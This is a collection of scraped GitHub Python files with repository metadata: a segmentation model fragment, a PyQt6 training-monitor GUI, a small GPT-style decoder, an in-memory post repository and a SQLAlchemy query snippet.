# with deeplab
'''seg_out = self.deeplab_head(out, feat_2, feat_1)
seg_out = F.interpolate(seg_out, size=x.size()[2:], mode="bilinear", align_corners=True)'''
if self.training:
return seg_out, intra_context_proir_map
return seg_out
from utils.utils import get_model_infos
@get_model_infos
def cpnet(num_classes, backend="resnet34", pretrained=False):
model = CPNet(num_classes, backend=backend, pretrained=pretrained)
return model
if __name__ == "__main__":
model = CPNet(20)
inputs = torch.randn(1, 3, 640, 640)
seg_out, context_map = model(inputs)
print("segout: ", seg_out.size(), ' context_map siz: ', context_map.size())
# labels = torch.randint(0, 20, (1, 640, 640)).long()
# model._get_loss(context_map, labels, [80, 80])
'''model = cpnet_resnet34(4, pretrained=False)
feat = torch.randn(1, 3, 640, 640)
out, context_proir_map = model(feat)
print(out.size(), " context_proir_map size: ", context_proir_map.size())''' | yadongJiang/semantic-segmentation-projects | libs/cpnet/model.py | model.py | py | 7,478 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "torch.nn.Sequential",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_num... |
152948829 | import PyQt6
import pandas as pd
from PyQt6 import QtWidgets, QtGui, QtCore
from PyQt6.QtCore import pyqtSignal, pyqtSlot, Qt
from PyQt6.QtWidgets import QListWidget, QFileDialog
from matplotlib.backends.backend_qtagg import FigureCanvasQTAgg
from matplotlib.figure import Figure
from gui.HyperParamterWidget import HyperParameterWidget
from gui.HyperParamterWidgetBool import HyperParameterWidgetBool
from gui.Slider import Slider
from model.profiles.builder.data_readers import DataReaders
from model.profiles.builder.losses import Losses
from model.profiles.builder.models import Models
from model.profiles.builder.optimizers import Optimizers
from model.profiles.training_configuration import TrainingConfiguration
from model.profiles.training_profile import TrainingProfile
from model.profiles.training_session import Session
from utils.ConfigChangedArgs import ConfigChangedArgs
from utils.ListChangedArgs import ListChangedArgs
from utils.gui_tools import add_vlayout
from utils.stat_tools import calc_profile_f1, calc_data_stats
class CustomCanvas(FigureCanvasQTAgg):
def __init__(self, parent=None, width=5, height=4, dpi=200):
fig = Figure(figsize=(width, height), dpi=dpi)
self.ax_loss = fig.add_subplot()
super(CustomCanvas, self).__init__(fig)
class MainWindow(QtWidgets.QMainWindow):
# --- signals -------------------------
start_multi_fit = pyqtSignal(int, int)
train_signal = pyqtSignal()
close_signal = pyqtSignal()
config_changed = pyqtSignal(ConfigChangedArgs)
create_profile = pyqtSignal()
profile_selection_changed = pyqtSignal(int)
select_session = pyqtSignal(int)
export_model = pyqtSignal(int)
clear_session = pyqtSignal()
signal_remove_session = pyqtSignal(int)
signal_clone_model = pyqtSignal(str)
signal_clone_data = pyqtSignal(str)
signal_validate = pyqtSignal()
# --- slots ---------------------------
@pyqtSlot(bool)
def on_export_state_changed(self, running):
self.gb_state.setEnabled(not running)
@pyqtSlot(list)
def profiles_updates(self, profiles):
self.plot_accuracies(profiles)
@pyqtSlot(int, int)
def job_time_update(self, sec, epoch):
min = int(sec/60)
h = int(min/60)
min = min % 60
sec = sec % 60
self.time_label.setText(f"remaining: ~{h}h {min}min {sec}s (~{epoch} s per epoch)")
@pyqtSlot(bool)
def fit_status_changed(self, active):
if active:
self.fit_button.setText("Stop")
else:
self.fit_button.setText("Fit")
self.time_label.setText("")
@pyqtSlot(Session)
def session_changed(self, args):
if args.type == ListChangedArgs.ADDED:
self.session_list.addItem(args.data.get_name())
if args.type == ListChangedArgs.UPDATED:
self.update_session(args.data)
if args.index != -1 and self.session_list.count() >= args.index:
self.session_list.item(args.index).setText(args.data.get_name())
if args.type == ListChangedArgs.REMOVED:
self.session_list.takeItem(args.index)
if args.type == ListChangedArgs.RESET:
self.session_list.clear()
for s in args.data:
self.session_list.addItem(s.get_name())
@pyqtSlot(TrainingProfile)
def profiles_added(self, profile):
self.profile_list.addItem(profile.name)
checkbox = QtWidgets.QCheckBox(profile.name)
checkbox.setChecked(False)
checkbox.stateChanged.connect(self.acc_cb_state_changed)
self.acc_layout.addWidget(checkbox)
self.acc_cbs.append(checkbox)
@pyqtSlot(TrainingConfiguration)
def config_update(self, config):
self.refresh_config_category('opt', config.optimizer, self._opt_param_widgets, self.opt_layout, self.optimizer_cb)
self.refresh_config_category('loss', config.loss, self._loss_param_widgets, self.loss_layout, self.loss_cb)
self.refresh_config_category('model', config.model, self._model_param_widgets, self.model_layout, self.model_cb)
self.refresh_config_category('reader', config.data, self._data_param_widgets, self.data_layout, self.data_cb)
self.config_name_label.setText(config.get_name())
self.create_profile_button.setEnabled(config.is_complete())
@pyqtSlot(int, TrainingProfile)
def profile_selected(self, i, profile):
self.profile_list.setCurrentRow(i)
@pyqtSlot(int, int, int, bool)
def on_batch_complete(self, i, cnt, remaining, training):
if training:
self.label_phase.setText('training')
else:
self.label_phase.setText('validation')
if i < 0:
self.label_batch.setText('preparing')
self.label_time.setText('')
elif i < cnt:
self.label_batch.setText(f'current batch: {i}/{cnt}')
self.label_time.setText(f'time remaining: ~{remaining} s')
else:
self.label_batch.setText('calculating metrics')
self.label_time.setText('')
# --- handler --------------------------
def button_clone_data_clicked(self):
dlg = QFileDialog()
# dlg.setFileMode(QFileDialog.AnyFile)
# dlg.setFilter("Numpy Data File (*.npy)")
if dlg.exec_():
filenames = dlg.selectedFiles()
if len(filenames) != 0:
self.signal_clone_data.emit(filenames[0])
def button_clone_model_clicked(self):
filename = QFileDialog.getOpenFileName(self, 'Open file', filter="Checkpoint (*.ckp)")
self.signal_clone_model.emit(filename[0])
def remove_profile_clicked(self):
self.signal_remove_session.emit(self.profile_list.currentRow)
def acc_cb_state_changed(self, checked):
self.plot_accuracies(self._profiles)
def session_selection_changed(self, index):
self.select_session.emit(index)
def model_selection_changed(self, txt):
self.config_changed.emit(ConfigChangedArgs('model', txt, None, None))
def opt_selection_changed(self, txt):
self.config_changed.emit(ConfigChangedArgs('opt', txt, None, None))
def data_selection_changed(self, txt):
self.config_changed.emit(ConfigChangedArgs('reader', txt, None, None))
def loss_selection_changed(self, txt):
self.config_changed.emit(ConfigChangedArgs('loss', txt, None, None))
def hp_changed(self, category, index, value):
self.config_changed.emit(ConfigChangedArgs(category, None, index, value))
def closeEvent(self, event):
self.close_signal.emit()
def create_profile_clicked(self):
self.create_profile.emit()
def change_profile_selection(self):
self.profile_selection_changed.emit(self.profile_list.currentRow())
def click_fit(self):
self.start_multi_fit.emit(self.session_slider.value, self.epoch_slider.value)
# --- private methods ------------------
def update_session(self, session):
self.plot_session(session)
if session.epoch_cnt() == 0:
return
self.label_current.setText(f'cur: (c: {round(session.f1_crack[-1],3)}, i: {round(session.f1_inactive[-1],3)}, m: {round(session.f1[-1],3)})')
self.label_best_mean.setText(f'best m: ({round(session.best_f1_m[0],3)}, {round(session.best_f1_m[1],3)}, {round(session.best_f1_m[2],3)})')
self.label_best_crack.setText(f'best c: ({round(session.best_f1_c[0],3)}, {round(session.best_f1_c[1],3)}, {round(session.best_f1_c[2],3)})')
self.label_best_inactive.setText(f'best i: ({round(session.best_f1_i[0],3)}, {round(session.best_f1_i[1],3)}, {round(session.best_f1_i[2],3)})')
stats = calc_data_stats(session)
self.label_data_stat_t_nbr.setText(str(stats[0][0]))
self.label_data_stat_v_nbr.setText(str(stats[0][1]))
self.label_data_stat_t_f.setText(str(stats[1][0]))
self.label_data_stat_v_f.setText(str(stats[1][1]))
self.label_data_stat_t_c.setText(str(stats[2][0]))
self.label_data_stat_v_c.setText(str(stats[2][1]))
self.label_data_stat_t_i.setText(str(stats[3][0]))
self.label_data_stat_v_i.setText(str(stats[3][1]))
self.label_data_stat_t_b.setText(str(stats[4][0]))
self.label_data_stat_v_b.setText(str(stats[4][1]))
def refresh_config_category(self, cat, descriptor, widgets, layout, combo_box):
# remove hyperparameters if descriptor is None, doesn't contain hp or type selection was changed
if descriptor is None or descriptor.hyperparams is None \
or (combo_box is not None and combo_box.currentText() != descriptor.name)\
or len(widgets) != len(descriptor.hyperparams):
for w in widgets:
w.value_changed.disconnect(self.hp_changed)
layout.removeWidget(w)
widgets.clear()
# reset combo_box and return if descriptor is None
if descriptor is None:
combo_box.setCurrentIndex(-1)
return
if combo_box is not None:
combo_box.setCurrentText(descriptor.name)
if descriptor.hyperparams is None:
return
if len(descriptor.hyperparams) != len(widgets):
for i, param in enumerate(descriptor.hyperparams):
if param.type == 'bool':
pw = HyperParameterWidgetBool(cat, i, param)
else:
pw = HyperParameterWidget(cat, i, param)
pw.value_changed.connect(self.hp_changed)
layout.addWidget(pw)
widgets.append(pw)
else:
for i, param in enumerate(descriptor.hyperparams):
widgets[i].set_value(param.get_value())
def plot_session(self, session):
self.canvas.ax_loss.clear()
self.last_session = session
tr_loss = session.training_loss
val_loss = session.eval_loss
if len(tr_loss) > 15:
tr_loss = tr_loss[5:]
val_loss = val_loss[5:]
#if len(tr_loss) > 10:
# tr_loss = tr_loss[10:]
# val_loss = val_loss[10:]
training_loss = pd.Series(tr_loss).rolling(self.rolling_average).mean()
eval_loss = pd.Series(val_loss).rolling(self.rolling_average).mean()
self.canvas.ax_loss.plot(training_loss, label='training loss')
self.canvas.ax_loss.plot(eval_loss, label='test loss')
self.canvas.ax_loss.legend()
self.canvas.draw()
def plot_accuracies(self, profiles):
if profiles is None:
return
self._profiles = profiles
self.acc_ax.clear()
# f1 mean
once = False
for i, p in enumerate(profiles):
if not self.acc_cbs[i].isChecked():
continue
once = True
f1, f1_c, f1_i = calc_profile_f1(p)
ts = pd.Series(f1)
data = ts.rolling(self.rolling_average).mean()
self.acc_ax.plot(data, label=f'{p.name} (mean)')
if not self.plot_only_mean:
ts = pd.Series(f1_c)
data = ts.rolling(self.rolling_average).mean()
self.acc_ax.plot(data, label=f'{p.name} (crack)')
ts = pd.Series(f1_i)
data = ts.rolling(self.rolling_average).mean()
self.acc_ax.plot(data, label=f'{p.name} (inactive)')
if once:
self.acc_ax.legend()
self.acc_canvas.draw()
def smooth_slider_value_changed(self, value):
self.rolling_average = int(value)
self.plot_accuracies(self._profiles)
if self.last_session is not None:
self.plot_session((self.last_session))
def epoch_slider_value_changed(self, value):
self.acc_cnt = int(value)
self.plot_accuracies(self._profiles)
def button_export_current(self):
self.export_model.emit(0)
def button_export_best_m(self):
self.export_model.emit(3)
def button_export_best_c(self):
self.export_model.emit(1)
def button_export_best_i(self):
self.export_model.emit(2)
def button_clear_session_clicked(self):
self.clear_session.emit()
def click_validate(self):
self.signal_validate.emit()
# --- construction ---------------------
def load_profile_builder(self):
self.loss_cb.addItems(Losses.losses)
self.optimizer_cb.addItems(Optimizers.optimizers)
self.model_cb.addItems(Models.models)
self.data_cb.addItems(DataReaders.reader)
def __init__(self):
super(MainWindow, self).__init__()
self.plot_only_mean = False
self.rolling_average = 1
self.acc_cnt = 50
self._profiles = None
self._opt_param_widgets = []
self._model_param_widgets = []
self._data_param_widgets = []
self._loss_param_widgets = []
self.acc_figure = Figure()
self.acc_ax = self.acc_figure.add_subplot()
self.last_session = None
# new configuration widgets
self.model_layout = None
self.loss_layout = None
self.opt_layout = None
self.data_layout = None
self.config_name_label = None
self.create_profile_button = None
self.model_cb = None
self.loss_cb = None
self.optimizer_cb = None
# profile widgets
self.profile_list = None
self.label_data_stat_t_nbr = None
self.label_data_stat_t_f = None
self.label_data_stat_t_c = None
self.label_data_stat_t_i = None
self.label_data_stat_t_b = None
self.label_data_stat_v_nbr = None
self.label_data_stat_v_f = None
self.label_data_stat_v_c = None
self.label_data_stat_v_i = None
self.label_data_stat_v_b = None
# session widgets
self.session_list = None
self.session_slider = None
self.epoch_slider = None
self.fit_button = None
self.time_label = None
self.label_current = None
self.label_best_mean = None
self.label_best_crack = None
self.label_best_inactive = None
self.gb_state = None
self.label_batch = None
self.label_phase = None
self.label_time = None
# monitoring widgets
self.acc_canvas = None
self.canvas = None
self.profile_acc_check_gb = None
self.acc_layout = None
self.acc_cbs = []
self.button_clone_model = None
self.button_clone_data = None
self.init_widgets()
# --- horizontal main layout -----
# ---------------------------------
self.load_profile_builder()
def init_config_widgets(self, layout):
# config_layout
# --- declarations
gb_model = QtWidgets.QGroupBox("Model")
self.model_layout = QtWidgets.QVBoxLayout()
gb_loss = QtWidgets.QGroupBox("Loss")
self.loss_layout = QtWidgets.QVBoxLayout()
gb_opt = QtWidgets.QGroupBox("Optimizer")
self.opt_layout = QtWidgets.QVBoxLayout()
gb_data = QtWidgets.QGroupBox("Data")
self.data_layout = QtWidgets.QVBoxLayout()
placeholder = QtWidgets.QWidget()
self.config_name_label = QtWidgets.QLabel()
self.create_profile_button = QtWidgets.QPushButton("Create Profile")
self.model_cb = QtWidgets.QComboBox() # model selection
self.loss_cb = QtWidgets.QComboBox() # loss selection
self.optimizer_cb = QtWidgets.QComboBox() # optimizer selection
self.data_cb = QtWidgets.QComboBox() # model selection
# --- layout
layout.addWidget(gb_model)
self.model_layout.addWidget(self.model_cb)
layout.addWidget(gb_loss)
self.loss_layout.addWidget(self.loss_cb)
layout.addWidget(gb_opt)
self.opt_layout.addWidget(self.optimizer_cb)
layout.addWidget(gb_data)
self.data_layout.addWidget(self.data_cb)
layout.addWidget(placeholder)
layout.addWidget(self.config_name_label)
layout.addWidget(self.create_profile_button)
# --- initialization
gb_model.setLayout(self.model_layout)
gb_loss.setLayout(self.loss_layout)
gb_opt.setLayout(self.opt_layout)
gb_data.setLayout(self.data_layout)
placeholder.setSizePolicy(QtWidgets.QSizePolicy.Policy.Maximum, QtWidgets.QSizePolicy.Policy.Expanding)
self.create_profile_button.setEnabled(False)
self.create_profile_button.clicked.connect(self.create_profile_clicked)
self.model_cb.currentTextChanged.connect(self.model_selection_changed)
self.loss_cb.currentTextChanged.connect(self.loss_selection_changed)
self.optimizer_cb.currentTextChanged.connect(self.opt_selection_changed)
self.data_cb.currentTextChanged.connect(self.data_selection_changed)
def init_profile_widgets(self, layout):
# profile layout
# --- declarations
self.profile_list = QListWidget()
button_remove = QtWidgets.QPushButton('Remove')
label = QtWidgets.QLabel("Training Profiles")
# self.acc_canvas = FigureCanvasQTAgg(self.acc_figure)
gb_data = QtWidgets.QGroupBox('Session Data')
data_layout = QtWidgets.QGridLayout(gb_data)
label_r0 = QtWidgets.QLabel('t')
label_r1 = QtWidgets.QLabel('v')
label_c0 = QtWidgets.QLabel('#')
label_c1 = QtWidgets.QLabel('#f')
label_c2 = QtWidgets.QLabel('#c')
label_c3 = QtWidgets.QLabel('#i')
label_c4 = QtWidgets.QLabel('#b')
self.label_data_stat_t_nbr = QtWidgets.QLabel('0')
self.label_data_stat_t_f = QtWidgets.QLabel('0')
self.label_data_stat_t_c = QtWidgets.QLabel('0')
self.label_data_stat_t_i = QtWidgets.QLabel('0')
self.label_data_stat_t_b = QtWidgets.QLabel('0')
self.label_data_stat_v_nbr = QtWidgets.QLabel('0')
self.label_data_stat_v_f = QtWidgets.QLabel('0')
self.label_data_stat_v_c = QtWidgets.QLabel('0')
self.label_data_stat_v_i = QtWidgets.QLabel('0')
self.label_data_stat_v_b = QtWidgets.QLabel('0')
# --- layout
layout.addWidget(label)
layout.addWidget(self.profile_list)
layout.addWidget(button_remove)
layout.addWidget(gb_data)
data_layout.addWidget(label_r0, 0, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_r1, 0, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_c0, 1, 0, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_c1, 2, 0, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_c2, 3, 0, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_c3, 4, 0, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_c4, 5, 0, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_t_nbr, 1, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_t_f, 2, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_t_c, 3, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_t_i, 4, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_t_b, 5, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_v_nbr, 1, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_v_f, 2, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_v_c, 3, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_v_i, 4, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_v_b, 5, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
# --- initialization
self.profile_list.setFixedWidth(300)
self.profile_list.itemSelectionChanged.connect(self.change_profile_selection)
button_remove.clicked.connect(self.remove_profile_clicked)
def init_session_widgets(self, layout, panel):
# --- declarations
self.session_list = QListWidget()
label = QtWidgets.QLabel("Training Sessions")
gb_training = QtWidgets.QGroupBox('Training')
self.session_slider = Slider('session #', 1, 100, 1)
self.epoch_slider = Slider('epoch #', 1, 1000, 10)
self.fit_button = QtWidgets.QPushButton('Fit')
self.time_label = QtWidgets.QLabel("")
clear_button = QtWidgets.QPushButton('Clear')
self.gb_state = QtWidgets.QGroupBox('Status')
status_grid = QtWidgets.QGridLayout(self.gb_state)
self.label_current = QtWidgets.QLabel('cur: (0.000, 0.000, 0.000)')
self.label_best_mean = QtWidgets.QLabel('best m: (0.000, 0.000, 0.000)')
self.label_best_crack = QtWidgets.QLabel('best c: (0.000, 0.000, 0.000)')
self.label_best_inactive = QtWidgets.QLabel('best i: (0.000, 0.000, 0.000)')
button_export_current = QtWidgets.QPushButton('Export')
button_export_best_m = QtWidgets.QPushButton('Export')
button_export_best_c = QtWidgets.QPushButton('Export')
button_export_best_i = QtWidgets.QPushButton('Export')
self.label_batch = QtWidgets.QLabel()
self.label_phase = QtWidgets.QLabel()
self.label_time = QtWidgets.QLabel()
val_button = QtWidgets.QPushButton('Validate')
self.button_clone_model = QtWidgets.QPushButton('Set Checkpoint')
self.button_clone_data = QtWidgets.QPushButton('Set Data')
# --- layout
layout.addWidget(label)
layout.addWidget(self.session_list)
layout.addWidget(gb_training)
training_layout, _ = add_vlayout(layout)
training_layout.addWidget(self.button_clone_model)
training_layout.addWidget(self.button_clone_data)
training_layout.addWidget(self.session_slider)
training_layout.addWidget(self.epoch_slider)
training_layout.addWidget(clear_button)
training_layout.addWidget(val_button)
training_layout.addWidget(self.fit_button)
training_layout.addWidget(self.time_label)
layout.addWidget(self.gb_state)
status_grid.addWidget(self.label_current, 0, 0)
status_grid.addWidget(self.label_best_mean, 1, 0)
status_grid.addWidget(self.label_best_crack, 2, 0)
status_grid.addWidget(self.label_best_inactive, 3, 0)
status_grid.addWidget(button_export_current, 0, 1)
status_grid.addWidget(button_export_best_m, 1, 1)
status_grid.addWidget(button_export_best_c, 2, 1)
status_grid.addWidget(button_export_best_i, 3, 1)
layout.addWidget(self.label_phase)
layout.addWidget(self.label_batch)
layout.addWidget(self.label_time)
# --- initialization
panel.setFixedWidth(250)
self.session_list.currentRowChanged.connect(self.session_selection_changed)
gb_training.setLayout(training_layout)
self.fit_button.clicked.connect(self.click_fit)
button_export_current.clicked.connect(self.button_export_current)
button_export_best_c.clicked.connect(self.button_export_best_c)
button_export_best_i.clicked.connect(self.button_export_best_i)
button_export_best_m.clicked.connect(self.button_export_best_m)
clear_button.clicked.connect(self.button_clear_session_clicked)
self.button_clone_model.clicked.connect(self.button_clone_model_clicked)
self.button_clone_data.clicked.connect(self.button_clone_data_clicked)
val_button.clicked.connect(self.click_validate)
panel.setFixedWidth(350)
def init_monitoring_widgets(self, layout):
# declarations
tab = QtWidgets.QTabWidget()
self.canvas = CustomCanvas()
acc_panel = QtWidgets.QWidget()
self.acc_layout = QtWidgets.QVBoxLayout()
self.acc_canvas = FigureCanvasQTAgg(self.acc_figure)
epoch_slider = Slider("max epoch", 10, 500, self.acc_cnt)
smooth_slider = Slider("running average cnt", 1, 20, self.rolling_average)
self.profile_acc_check_gb = QtWidgets.QGroupBox('Visible')
# layout
layout.addWidget(tab)
tab.addTab(self.canvas, "Session Plot")
tab.addTab(acc_panel, "Accuracies")
self.acc_layout.addWidget(self.acc_canvas)
self.acc_layout.addWidget(epoch_slider)
layout.addWidget(smooth_slider)
# initializations
tab.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,
QtWidgets.QSizePolicy.Policy.Ignored)
self.canvas.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,
QtWidgets.QSizePolicy.Policy.Expanding)
acc_panel.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,
QtWidgets.QSizePolicy.Policy.Expanding)
acc_panel.setLayout(self.acc_layout)
epoch_slider.value_changed.connect(self.epoch_slider_value_changed)
smooth_slider.value_changed.connect(self.smooth_slider_value_changed)
smooth_slider.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,
QtWidgets.QSizePolicy.Policy.Fixed)
def init_widgets(self):
main = QtWidgets.QWidget()
self.setCentralWidget(main)
main_layout = QtWidgets.QHBoxLayout()
main.setLayout(main_layout)
config_layout, config_panel = add_vlayout(main_layout)
profile_layout, profile_panel = add_vlayout(main_layout)
session_layout, session_panel = add_vlayout(main_layout)
monitoring_layout, monitoring_panel = add_vlayout(main_layout)
self.init_config_widgets(config_layout)
self.init_profile_widgets(profile_layout)
self.init_session_widgets(session_layout, session_panel)
self.init_monitoring_widgets(monitoring_layout)
config_panel.setSizePolicy(QtWidgets.QSizePolicy.Policy.Fixed,
QtWidgets.QSizePolicy.Policy.Expanding)
profile_panel.setSizePolicy(QtWidgets.QSizePolicy.Policy.Fixed,
QtWidgets.QSizePolicy.Policy.Expanding)
session_panel.setSizePolicy(QtWidgets.QSizePolicy.Policy.Fixed,
QtWidgets.QSizePolicy.Policy.Expanding)
monitoring_panel.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,
QtWidgets.QSizePolicy.Policy.Expanding)
| Falrach94/deeplearning_ex4 | gui/MainWindow.py | MainWindow.py | py | 26,881 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.backends.backend_qtagg.FigureCanvasQTAgg",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "matplotlib.figure.Figure",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "PyQt6.QtWidgets.QMainWindow",
"line_number": 35,
"usage_type... |
69982633063 | import torch
import torch.nn as nn
from torch.nn import functional as F
import math
from typing import Tuple
device = "cuda" if torch.cuda.is_available() else "cpu"
class Embedding(nn.Module):
def __init__(self,
config,
vocab_size):
"""
Embedding generates learnable representation of an input sequence which encodes
contextual, semantic meaning for each word.
Params:
d_model(int): specifies the embedding dimension for each token/word
vocab_size(int): number of embeddings that would be needed. # of unique words
max_seq_len(int): the maximum sequence length of an input sequence. Used for generation positional encoding
dropout(float): probability of dropout applied on the final embedding output
"""
super().__init__()
self.vocab_size = vocab_size
self.token_embedding_table = nn.Embedding(num_embeddings=vocab_size,
embedding_dim=config["d_model"])
self.position_embedding_table = nn.Embedding(num_embeddings=config["context_length"],
embedding_dim=config["d_model"])
self.dropout = nn.Dropout(p=config["dropout"])
def forward(self, x: torch.Tensor) -> torch.Tensor:
# x => [B, S]
B, S = x.shape
token_emb = self.token_embedding_table(x) # [B, S, D]
pos_emb = self.position_embedding_table(torch.arange(S, device=device)).unsqueeze(0) # [1, S, D]
out = self.dropout(token_emb+pos_emb)
return self.dropout(out)
class AttentionHead(nn.Module):
def __init__(self,
config) -> None:
super().__init__()
self.d_model = config["d_model"]
self.head_dim = config["head_dim"]
self.query = nn.Linear(self.d_model, self.head_dim)
self.key = nn.Linear(self.d_model, self.head_dim)
self.value = nn.Linear(self.d_model, self.head_dim)
self.dropout = nn.Dropout(p=config["dropout"])
def forward(self,
query: torch.Tensor,
key: torch.Tensor,
value: torch.Tensor,
mask=None) -> torch.Tensor:
# query => [B, Q, D]
# key => [B, K, D]
# value => [B, K, D]
q = self.query(query) # B, Q, HEAD_DIM
k = self.key(key) # B, K, HEAD_DIM
v = self.value(value) # B, K, HEAD_DIM
weights = q @ k.transpose(1, 2) # B, Q, K
if mask is not None:
weights = weights.masked_fill(mask==0, value=float("-inf"))
weights = F.softmax(weights/math.sqrt(self.head_dim), dim=-1)
out = weights @ v # [B, Q, K] x [B, K, HEAD_DIM] => [B, Q, HEAD_DIM]
return self.dropout(out)
class MultiHeadAttention(nn.Module):
def __init__(self,
config) -> None:
super().__init__()
self.sa_heads = nn.ModuleList([AttentionHead(config) for _ in range(config["n_heads"])])
self.proj = nn.Linear(config["d_model"], config["d_model"])
self.dropout = nn.Dropout(p=config["dropout"])
def forward(self,
query: torch.Tensor,
key: torch.Tensor,
value: torch.Tensor,
mask=None) -> torch.Tensor:
out = torch.cat([h(query, key, value, mask) for h in self.sa_heads], dim=-1)
out = self.proj(out)
return self.dropout(out)
class FeedForward(nn.Module):
def __init__(self,
config):
super().__init__()
d_model = config["d_model"]
self.net = nn.Sequential(
nn.Linear(d_model, d_model*4),
nn.ReLU(),
nn.Linear(d_model*4, d_model),
nn.Dropout(p=config["dropout"])
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.net(x)
return x
class GPTDecoderBlock(nn.Module):
def __init__(self, config) -> None:
super().__init__()
self.mha = MultiHeadAttention(config)
self.ff = FeedForward(config)
self.ln_1 = nn.LayerNorm(normalized_shape=config["d_model"])
self.ln_2 = nn.LayerNorm(normalized_shape=config["d_model"])
def forward(self, x: torch.Tensor, mask=None) -> torch.Tensor:
x = x + self.mha(self.ln_1(x), self.ln_1(x), self.ln_1(x), mask)
x = x + self.ff(self.ln_2(x))
return x
class GPTDecoder(nn.Module):
def __init__(self, config) -> None:
super().__init__()
self.blocks = nn.ModuleList([GPTDecoderBlock(config) for _ in range(config["n_decoders"])])
def forward(self, x: torch.Tensor, mask=None) -> torch.Tensor:
for block in self.blocks:
x = block(x, mask)
return x
class PoemGPT(nn.Module):
def __init__(self, config, vocab_size) -> None:
super().__init__()
self.context_length = config["context_length"]
self.embedding = Embedding(config, vocab_size)
self.gpt = GPTDecoder(config)
self.lm_head = nn.Linear(config["d_model"], vocab_size)
def forward(self,
x: torch.Tensor,
targets: torch.Tensor = None) -> Tuple[torch.Tensor, torch.Tensor]:
B, S = x.shape
# x -> [B, S], targets -> [B, S]
x = self.embedding(x) # B, S, D_MODEL
mask = create_causal_mask(S)
x = self.gpt(x, mask) # B, S, D_MODEL
logits = self.lm_head(x) # B, S, VOCAB_SIZE
if targets is None:
loss = None
else:
logits = logits.view(B*S, -1)
targets = targets.view(-1)
loss = F.cross_entropy(logits, targets)
return logits, loss
def generate(self, x:torch.Tensor=None, max_new_tokens: int=500) -> torch.Tensor:
if x is None:
x = torch.zeros((1, 1), dtype=torch.long, device=device) # B, S
for _ in range(max_new_tokens):
preds, _ = self(x[:, -self.context_length:])# B, S, VOCAB_SIZE
preds = preds[:, -1, :] # B, VOCAB_SIZE
probs = F.softmax(preds, dim=-1)
x_next = torch.multinomial(input=probs, num_samples=1) # B, 1
x = torch.cat((x, x_next), dim=1) # B, S+1
return x
def create_causal_mask(sz):
mask = torch.ones((sz, sz), device=device)
mask = torch.tril(mask)
return mask | SkAndMl/MusGPT | model.py | model.py | py | 6,552 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "torch.cuda.is_available",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Module",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
... |
198794662 | import abc
from typing import Dict, List
from uuid import UUID
from moderation_ml_example.models import Post
class PostNotFoundError(Exception):
pass
class PostRepository:
__metaclass__ = abc.ABCMeta
async def save(self, post: Post) -> None:
...
async def get(self, id: UUID) -> Post:
...
async def list(self) -> List[Post]:
...
async def list_unmoderated(self) -> List[Post]:
...
class InMemoryPostRepository(PostRepository):
def __init__(self):
self._posts: Dict[UUID, Post] = {}
async def save(self, post: Post) -> None:
self._posts[post.id] = post.copy()
async def get(self, id: UUID) -> Post:
try:
return self._posts[id].copy()
except KeyError as exc:
raise PostNotFoundError(f"Post with id {id} cannot be found") from exc
async def list(self) -> List[Post]:
return [post.copy() for post in self._posts.values()]
async def list_unmoderated(self) -> List[Post]:
return [
post.copy()
for post in self._posts.values()
if post.requires_moderation
]
| mikeyjkmo/post-moderation-example | moderation_ml_example/repository.py | repository.py | py | 1,156 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "abc.ABCMeta",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "moderation_ml_example.models.Post",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "uuid.UUID",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "moderati... |
14716003738 | from sqlalchemy import create_engine, text, MetaData, Table, Column, Integer, String, select
engine = create_engine('postgresql://postgres:1@localhost/news_db')
meta = MetaData()
students = Table(
'students', meta,
Column('id', Integer, primary_key=True),
Column('first_name', String),
Column('last_name', String))
# meta.create_all(engine)
conn = engine.connect()
st = students.alias()
s = st.select().where(st.c.id > 2)
result = conn.execute(s).fetchall()
print(result)
